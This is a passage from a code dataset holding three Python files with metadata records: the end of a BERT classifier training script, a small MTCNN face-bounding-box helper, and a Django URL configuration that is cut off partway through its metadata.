tf.estimator.export.build_raw_serving_input_receiver_fn(features)()\n\ndef decode_predicts(predicts,\n sent_label_list,\n max_seq_length,\n tokenizer):\n decoded_predicts = []\n for predict in predicts:\n input_tokens = tokenizer.convert_ids_to_tokens(predict[\"input_ids\"])\n input_masks = predict[\"input_masks\"]\n \n decoded_tokens = []\n for input_token, input_mask in zip(input_tokens, input_masks):\n if input_mask == 0:\n break\n \n if input_token in [\"[CLS]\", \"[SEP]\"]:\n continue\n \n if input_token[:2] == \"##\":\n decoded_tokens[-1] = decoded_tokens[-1] + input_token[2:]\n continue\n \n decoded_tokens.append(input_token)\n \n decoded_predict = {\n \"text\": \" \".join(decoded_tokens),\n \"sent_label\": sent_label_list[predict[\"sent_label_id\"]],\n \"sent_predict\": sent_label_list[predict[\"sent_predict_id\"]],\n \"sent_score\": float(predict[\"sent_predict_score\"]),\n \"sent_probs\": [float(prob) for prob in predict[\"sent_predict_prob\"]]\n }\n \n decoded_predicts.append(decoded_predict)\n \n return decoded_predicts\n\ndef write_to_json(data_list,\n data_path):\n data_folder = os.path.dirname(data_path)\n if not os.path.exists(data_folder):\n os.mkdir(data_folder)\n \n with open(data_path, \"w\") as file: \n json.dump(data_list, file, indent=4)\n\ndef write_to_text(data_list,\n data_path):\n data_folder = os.path.dirname(data_path)\n if not os.path.exists(data_folder):\n os.mkdir(data_folder)\n \n with open(data_path, \"w\") as file:\n for data in data_list:\n file.write(\"{0}\\n\".format(data))\n\ndef main(_):\n tf.logging.set_verbosity(tf.logging.INFO)\n \n np.random.seed(FLAGS.random_seed)\n \n bert_config = modeling.BertConfig.from_json_file(FLAGS.bert_config_file)\n \n if FLAGS.max_seq_length > bert_config.max_position_embeddings:\n raise ValueError(\"Cannot use sequence length %d because the BERT model was only trained up to sequence length %d\" %\n (FLAGS.max_seq_length, bert_config.max_position_embeddings))\n \n tf.gfile.MakeDirs(FLAGS.output_dir)\n \n tokenization.validate_case_matches_checkpoint(FLAGS.do_lower_case, FLAGS.init_checkpoint)\n tokenizer = tokenization.FullTokenizer(vocab_file=FLAGS.vocab_file, do_lower_case=FLAGS.do_lower_case)\n \n data_dir = FLAGS.data_dir\n task_name = FLAGS.task_name.lower()\n processor = ClassificationProcessor(data_dir, task_name)\n sent_label_list = processor.get_sent_labels()\n \n train_examples = None\n num_train_steps = None\n num_warmup_steps = None\n if FLAGS.do_train:\n train_examples = processor.get_train_examples()\n num_train_steps = int(len(train_examples) / FLAGS.train_batch_size * FLAGS.num_train_epochs)\n num_warmup_steps = int(num_train_steps * FLAGS.warmup_proportion)\n \n tpu_cluster_resolver = None\n if FLAGS.use_tpu and FLAGS.tpu_name:\n tpu_cluster_resolver = tf.contrib.cluster_resolver.TPUClusterResolver(\n FLAGS.tpu_name, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project)\n \n is_per_host = tf.contrib.tpu.InputPipelineConfig.PER_HOST_V2\n run_config = tf.contrib.tpu.RunConfig(\n cluster=tpu_cluster_resolver,\n master=FLAGS.master,\n model_dir=FLAGS.output_dir,\n save_checkpoints_steps=FLAGS.save_checkpoints_steps,\n tpu_config=tf.contrib.tpu.TPUConfig(\n iterations_per_loop=FLAGS.iterations_per_loop,\n num_shards=FLAGS.num_tpu_cores,\n per_host_input_for_training=is_per_host))\n \n model_fn = model_fn_builder(\n bert_config=bert_config,\n sent_label_list=sent_label_list,\n init_checkpoint=FLAGS.init_checkpoint,\n learning_rate=FLAGS.learning_rate,\n num_train_steps=num_train_steps,\n num_warmup_steps=num_warmup_steps,\n use_tpu=FLAGS.use_tpu)\n \n # If TPU is not available, this will fall back to normal Estimator on CPU or GPU.\n estimator = tf.contrib.tpu.TPUEstimator(\n use_tpu=FLAGS.use_tpu,\n model_fn=model_fn,\n config=run_config,\n export_to_tpu=FLAGS.use_tpu,\n train_batch_size=FLAGS.train_batch_size,\n eval_batch_size=FLAGS.eval_batch_size,\n predict_batch_size=FLAGS.predict_batch_size)\n \n if FLAGS.do_train:\n tf.logging.info(\"***** Run training *****\")\n tf.logging.info(\" Num examples = %d\", len(train_examples))\n tf.logging.info(\" Batch size = %d\", FLAGS.train_batch_size)\n tf.logging.info(\" Num steps = %d\", num_train_steps)\n \n train_features = convert_examples_to_features(\n examples=train_examples,\n sent_label_list=sent_label_list,\n max_seq_length=FLAGS.max_seq_length,\n tokenizer=tokenizer)\n\n train_input_fn = input_fn_builder(\n features=train_features,\n seq_length=FLAGS.max_seq_length,\n is_training=True,\n drop_remainder=True)\n \n estimator.train(input_fn=train_input_fn, max_steps=num_train_steps)\n \n if FLAGS.do_eval:\n eval_examples = processor.get_dev_examples()\n tf.logging.info(\"***** Run evaluation *****\")\n tf.logging.info(\" Num examples = %d\", len(eval_examples))\n tf.logging.info(\" Batch size = %d\", FLAGS.eval_batch_size)\n \n eval_features = convert_examples_to_features(\n examples=eval_examples,\n sent_label_list=sent_label_list,\n max_seq_length=FLAGS.max_seq_length,\n tokenizer=tokenizer)\n\n eval_input_fn = input_fn_builder(\n features=eval_features,\n seq_length=FLAGS.max_seq_length,\n is_training=False,\n drop_remainder=False)\n \n result = estimator.evaluate(input_fn=eval_input_fn)\n \n sent_accuracy = result[\"sent_accuracy\"]\n \n tf.logging.info(\"***** Evaluation result *****\")\n tf.logging.info(\" Accuracy (sent-level) = %s\", str(sent_accuracy))\n \n if FLAGS.do_predict:\n predict_examples = processor.get_test_examples()\n tf.logging.info(\"***** Run prediction *****\")\n tf.logging.info(\" Num examples = %d\", len(predict_examples))\n tf.logging.info(\" Batch size = %d\", FLAGS.predict_batch_size)\n \n predict_features = convert_examples_to_features(\n examples=predict_examples,\n sent_label_list=sent_label_list,\n max_seq_length=FLAGS.max_seq_length,\n tokenizer=tokenizer)\n\n predict_input_fn = input_fn_builder(\n features=predict_features,\n seq_length=FLAGS.max_seq_length,\n is_training=False,\n drop_remainder=False)\n \n result = estimator.predict(input_fn=predict_input_fn)\n \n predicts = [{\n \"input_ids\": feature.input_ids,\n \"input_masks\": feature.input_masks,\n \"sent_label_id\": feature.sent_label_id,\n \"sent_predict_id\": predict[\"sent_predict_id\"],\n \"sent_predict_score\": predict[\"sent_predict_score\"],\n \"sent_predict_prob\": predict[\"sent_predict_prob\"].tolist()\n } for feature, predict in zip(predict_features, result)]\n \n decoded_predicts = decode_predicts(\n predicts=predicts,\n sent_label_list=sent_label_list,\n max_seq_length=FLAGS.max_seq_length,\n tokenizer=tokenizer)\n \n predict_tag = FLAGS.predict_tag if FLAGS.predict_tag else str(time.time())\n output_path = os.path.join(FLAGS.output_dir, \"predict.{0}.json\".format(predict_tag))\n write_to_json(decoded_predicts, output_path)\n \n if FLAGS.do_export:\n tf.logging.info(\"***** Running exporting *****\")\n tf.gfile.MakeDirs(FLAGS.export_dir)\n estimator.export_savedmodel(FLAGS.export_dir, serving_input_fn, as_text=False)\n\nif __name__ == \"__main__\":\n flags.mark_flag_as_required(\"bert_config_file\")\n flags.mark_flag_as_required(\"vocab_file\")\n flags.mark_flag_as_required(\"init_checkpoint\")\n flags.mark_flag_as_required(\"data_dir\")\n flags.mark_flag_as_required(\"output_dir\")\n flags.mark_flag_as_required(\"export_dir\")\n tf.app.run()\n", "sub_path": "run_classifier.py", "file_name": "run_classifier.py", "file_ext": "py", "file_size_in_byte": 32859, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "tensorflow.flags", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path", "line_number": 129, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 136, "usage_type": "call"}, {"api_name": "os.path", "line_number": 136, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 143, "usage_type": "call"}, {"api_name": "os.path", "line_number": 143, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 150, "usage_type": "call"}, {"api_name": "os.path", "line_number": 150, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 156, "usage_type": "call"}, {"api_name": "os.path", "line_number": 156, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 168, "usage_type": "call"}, {"api_name": "os.path", "line_number": 168, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 170, "usage_type": "call"}, {"api_name": "bert.tokenization.convert_to_unicode", "line_number": 180, "usage_type": "call"}, {"api_name": "bert.tokenization", "line_number": 180, "usage_type": "name"}, {"api_name": "bert.tokenization.convert_to_unicode", "line_number": 181, "usage_type": "call"}, {"api_name": "bert.tokenization", "line_number": 181, "usage_type": "name"}, {"api_name": "tensorflow.logging.info", "line_number": 258, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 258, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 259, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 259, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 260, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 260, "usage_type": "attribute"}, {"api_name": "bert.tokenization.printable_text", "line_number": 260, "usage_type": "call"}, {"api_name": "bert.tokenization", "line_number": 260, "usage_type": "name"}, {"api_name": "tensorflow.logging.info", "line_number": 261, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 261, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 262, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 262, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 263, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 263, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 264, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 264, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 281, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 281, "usage_type": "attribute"}, {"api_name": "tensorflow.data.Dataset.from_tensor_slices", "line_number": 311, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 311, "usage_type": "attribute"}, {"api_name": "tensorflow.constant", "line_number": 312, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 312, "usage_type": "attribute"}, {"api_name": "tensorflow.constant", "line_number": 313, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 313, "usage_type": "attribute"}, {"api_name": "tensorflow.constant", "line_number": 314, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 314, "usage_type": "attribute"}, {"api_name": "tensorflow.constant", "line_number": 315, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 315, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 320, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 320, "usage_type": "attribute"}, {"api_name": "tensorflow.train.Feature", "line_number": 334, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 334, "usage_type": "attribute"}, {"api_name": "tensorflow.train.Int64List", "line_number": 334, "usage_type": "call"}, {"api_name": "tensorflow.python_io.TFRecordWriter", "line_number": 336, "usage_type": "call"}, {"api_name": "tensorflow.python_io", "line_number": 336, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 340, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 340, "usage_type": "attribute"}, {"api_name": "collections.OrderedDict", "line_number": 344, "usage_type": "call"}, {"api_name": "tensorflow.train.Example", "line_number": 350, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 350, "usage_type": "attribute"}, {"api_name": "tensorflow.train.Features", "line_number": 350, "usage_type": "call"}, {"api_name": "tensorflow.FixedLenFeature", "line_number": 362, "usage_type": "call"}, {"api_name": "tensorflow.int64", "line_number": 362, "usage_type": "attribute"}, {"api_name": "tensorflow.FixedLenFeature", "line_number": 363, "usage_type": "call"}, {"api_name": "tensorflow.int64", "line_number": 363, "usage_type": "attribute"}, {"api_name": "tensorflow.FixedLenFeature", "line_number": 364, "usage_type": "call"}, {"api_name": "tensorflow.int64", "line_number": 364, "usage_type": "attribute"}, {"api_name": "tensorflow.FixedLenFeature", "line_number": 365, "usage_type": "call"}, {"api_name": "tensorflow.int64", "line_number": 365, "usage_type": "attribute"}, {"api_name": "tensorflow.parse_single_example", "line_number": 371, "usage_type": "call"}, {"api_name": "tensorflow.int64", "line_number": 376, "usage_type": "attribute"}, {"api_name": "tensorflow.to_int32", "line_number": 377, "usage_type": "call"}, {"api_name": "tensorflow.data.TFRecordDataset", "line_number": 388, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 388, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 392, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 392, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.data.map_and_batch", "line_number": 394, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 394, "usage_type": "attribute"}, {"api_name": "tensorflow.estimator", "line_number": 412, "usage_type": "attribute"}, {"api_name": "bert.modeling.BertModel", "line_number": 413, "usage_type": "call"}, {"api_name": "bert.modeling", "line_number": 413, "usage_type": "name"}, {"api_name": "tensorflow.variable_scope", "line_number": 423, "usage_type": "call"}, {"api_name": "tensorflow.AUTO_REUSE", "line_number": 423, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 425, "usage_type": "call"}, {"api_name": "tensorflow.reduce_max", "line_number": 425, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 425, "usage_type": "attribute"}, {"api_name": "tensorflow.glorot_uniform_initializer", "line_number": 427, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 427, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 427, "usage_type": "attribute"}, {"api_name": "tensorflow.float32", "line_number": 427, "usage_type": "attribute"}, {"api_name": "tensorflow.zeros_initializer", "line_number": 428, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 429, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 429, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dropout", "line_number": 433, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 433, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 433, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 433, "usage_type": "attribute"}, {"api_name": "tensorflow.estimator", "line_number": 436, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.softmax", "line_number": 440, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 440, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 441, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 441, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 441, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_max", "line_number": 442, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 444, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 444, "usage_type": "attribute"}, {"api_name": "tensorflow.estimator", "line_number": 445, "usage_type": "attribute"}, {"api_name": "tensorflow.variable_scope", "line_number": 449, "usage_type": "call"}, {"api_name": "tensorflow.AUTO_REUSE", "line_number": 449, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 450, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 450, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 451, "usage_type": "call"}, {"api_name": "tensorflow.reduce_max", "line_number": 451, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 451, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 452, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 452, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.sparse_softmax_cross_entropy_with_logits", "line_number": 453, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 453, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_sum", "line_number": 454, "usage_type": "call"}, {"api_name": "tensorflow.reduce_max", "line_number": 454, "usage_type": "call"}, {"api_name": "tensorflow.logging.info", "line_number": 472, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 472, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 474, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 474, "usage_type": "attribute"}, {"api_name": "tensorflow.estimator", "line_number": 479, "usage_type": "attribute"}, {"api_name": "tensorflow.trainable_variables", "line_number": 484, "usage_type": "call"}, {"api_name": "bert.modeling.get_assignment_map_from_checkpoint", "line_number": 489, "usage_type": "call"}, {"api_name": "bert.modeling", "line_number": 489, "usage_type": "name"}, {"api_name": "tensorflow.train.init_from_checkpoint", "line_number": 493, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 493, "usage_type": "attribute"}, {"api_name": "tensorflow.train.Scaffold", "line_number": 494, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 494, "usage_type": "attribute"}, {"api_name": "tensorflow.train.init_from_checkpoint", "line_number": 498, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 498, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 500, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 500, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 506, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 506, "usage_type": "attribute"}, {"api_name": "tensorflow.estimator", "line_number": 509, "usage_type": "attribute"}, {"api_name": "bert.optimization.create_optimizer", "line_number": 510, "usage_type": "call"}, {"api_name": "bert.optimization", "line_number": 510, "usage_type": "name"}, {"api_name": "tensorflow.contrib.tpu.TPUEstimatorSpec", "line_number": 511, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 511, "usage_type": "attribute"}, {"api_name": "tensorflow.estimator", "line_number": 516, "usage_type": "attribute"}, {"api_name": "tensorflow.metrics.accuracy", "line_number": 519, "usage_type": "call"}, {"api_name": "tensorflow.metrics", "line_number": 519, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.tpu.TPUEstimatorSpec", "line_number": 528, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 528, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.tpu.TPUEstimatorSpec", "line_number": 534, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 534, "usage_type": "attribute"}, {"api_name": "tensorflow.constant", "line_number": 553, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 553, "usage_type": "attribute"}, {"api_name": "tensorflow.constant", "line_number": 554, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 554, "usage_type": "attribute"}, {"api_name": "tensorflow.constant", "line_number": 555, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 555, "usage_type": "attribute"}, {"api_name": "tensorflow.constant", "line_number": 556, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 556, "usage_type": "attribute"}, {"api_name": "tensorflow.constant", "line_number": 557, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 557, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 559, "usage_type": "call"}, {"api_name": "tensorflow.not_equal", "line_number": 559, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 559, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 560, "usage_type": "call"}, {"api_name": "tensorflow.not_equal", "line_number": 560, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 560, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 561, "usage_type": "call"}, {"api_name": "tensorflow.not_equal", "line_number": 561, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 561, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 562, "usage_type": "call"}, {"api_name": "tensorflow.not_equal", "line_number": 562, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 562, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 563, "usage_type": "call"}, {"api_name": "tensorflow.not_equal", "line_number": 563, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 563, "usage_type": "attribute"}, {"api_name": "tensorflow.variable_scope", "line_number": 568, "usage_type": "call"}, {"api_name": "tensorflow.placeholder", "line_number": 570, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 570, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 571, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 571, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 572, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 572, "usage_type": "attribute"}, {"api_name": "tensorflow.estimator.export.build_raw_serving_input_receiver_fn", "line_number": 575, "usage_type": "call"}, {"api_name": "tensorflow.estimator", "line_number": 575, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 614, "usage_type": "call"}, {"api_name": "os.path", "line_number": 614, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 615, "usage_type": "call"}, {"api_name": "os.path", "line_number": 615, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 616, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 619, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 623, "usage_type": "call"}, {"api_name": "os.path", "line_number": 623, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 624, "usage_type": "call"}, {"api_name": "os.path", "line_number": 624, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 625, "usage_type": "call"}, {"api_name": "tensorflow.logging.set_verbosity", "line_number": 632, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 632, "usage_type": "attribute"}, {"api_name": "numpy.random.seed", "line_number": 634, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 634, "usage_type": "attribute"}, {"api_name": "bert.modeling.BertConfig.from_json_file", "line_number": 636, "usage_type": "call"}, {"api_name": "bert.modeling.BertConfig", "line_number": 636, "usage_type": "attribute"}, {"api_name": "bert.modeling", "line_number": 636, "usage_type": "name"}, {"api_name": "tensorflow.gfile.MakeDirs", "line_number": 642, "usage_type": "call"}, {"api_name": "tensorflow.gfile", "line_number": 642, "usage_type": "attribute"}, {"api_name": "bert.tokenization.validate_case_matches_checkpoint", "line_number": 644, "usage_type": "call"}, {"api_name": "bert.tokenization", "line_number": 644, "usage_type": "name"}, {"api_name": "bert.tokenization.FullTokenizer", "line_number": 645, "usage_type": "call"}, {"api_name": "bert.tokenization", "line_number": 645, "usage_type": "name"}, {"api_name": "tensorflow.contrib.cluster_resolver.TPUClusterResolver", "line_number": 662, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 662, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib", "line_number": 665, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.tpu.RunConfig", "line_number": 666, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 666, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.tpu.TPUConfig", "line_number": 671, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 671, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.tpu.TPUEstimator", "line_number": 686, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 686, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 696, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 696, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 697, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 697, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 698, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 698, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 699, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 699, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 717, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 717, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 718, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 718, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 719, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 719, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 737, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 737, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 738, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 738, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 742, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 742, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 743, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 743, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 744, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 744, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 775, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 776, "usage_type": "call"}, {"api_name": "os.path", "line_number": 776, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 780, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 780, "usage_type": "attribute"}, {"api_name": "tensorflow.gfile.MakeDirs", "line_number": 781, "usage_type": "call"}, {"api_name": "tensorflow.gfile", "line_number": 781, "usage_type": "attribute"}, {"api_name": "tensorflow.app.run", "line_number": 791, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 791, "usage_type": "attribute"}]} {"seq_id": "140256192", "text": "from mtcnn.mtcnn import MTCNN\n\nclass mtcnn_to_face_alignment:\n def __init__(self):\n self.detector = MTCNN()\n\n def find_bboxes(self, input_img):\n \"\"\"\n Recieve: an image\n\n Return: list of bbox format (x1, y1, x2, y2)\n \"\"\"\n faces_positions = self.detector.detect_faces(input_img)\n #format: (x1, y1, w, h) y probabilidad pero no interesa\n bbox_list = []\n if (len(faces_positions)!=0):\n for face in faces_positions:\n bbox = face['box']\n bbox_formated = [[bbox[0], bbox[1], bbox[0]+bbox[2], bbox[1]+bbox[3]]]\n bbox_list.append(bbox_formated)\n return bbox_list\n\n def size_of_bbox(self, bbox):\n \"\"\"\n return:\n multiplication of width x height\n \"\"\"\n return bbox[2]*bbox[3]\n #terminar\n def mtcnn_bbox_face_alignment_format_a(self, input_img):\n \"\"\"\n Recieve: an image\n\n Return: the biggest bbox format (x1, y1, x2, y2)\n \"\"\"\n max_size_box = 0\n size_box = 0\n bbox_to_return = None\n faces_positions = self.detector.detect_faces(input_img)\n #format: (x1, y1, w, h) y probabilidad pero no interesa\n bbox_list = []\n if (len(faces_positions)!=0):\n for face in faces_positions:\n bbox = face['box']\n size_box = size_of_bbox(bbox)\n if (size_box > max_size_box):\n bbox_to_return = bbox\n ###terminar para bbox return en nuevo formato\n bbox = bbox_to_return\n bbox_formated = [[bbox[0], bbox[1], bbox[0]+bbox[2], bbox[1]+bbox[3]]]\n bbox_list.append(bbox_formated)\n return bbox_list\n", "sub_path": "mtcnn_to_face_alignment.py", "file_name": "mtcnn_to_face_alignment.py", "file_ext": "py", "file_size_in_byte": 1741, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "mtcnn.mtcnn.MTCNN", "line_number": 5, "usage_type": "call"}]} {"seq_id": "244321045", "text": "from django.conf.urls import patterns, include, url\nfrom settings import APP_ROOT\n\nurlpatterns = patterns('',\n url(r'^$', 'register_users.views.home', name='home'),\n\n url(r'^static/(?P.*)$', 'django.views.static.serve', {'document_root': APP_ROOT+'static/'}),\n\n url(r'^uploads/(?P.*)$', 'django.views.static.serve', {'document_root': APP_ROOT+'uploads/'}),\n\n url(r'^media/img/(?P.*)$', 'django.views.static.serve', {'document_root': APP_ROOT+'uploads/photos/'}, name='images_link'),\n\n url(r'^accounts/', include('register_users.urls')),\n\n url(r'^msg/', include('private_message.urls')),\n\n url(r'^friend/', include('friends_app.urls')),\n\n url(r'^media/', include('media_app.urls')),\n\n url(r'^music/', include('music_app.urls')),\n\n url(r'^settings/', include('settings_app.urls')),\n\n url(r'^find/', include('find_app.urls'))\n)\n", "sub_path": "djangoproj/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 876, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "django.conf.urls.patterns", "line_number": 4, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 5, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "settings.APP_ROOT", "line_number": 7, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "settings.APP_ROOT", "line_number": 9, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "settings.APP_ROOT", "line_number": 11, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 13, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 15, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 17, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 17, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 19, "usage_type": 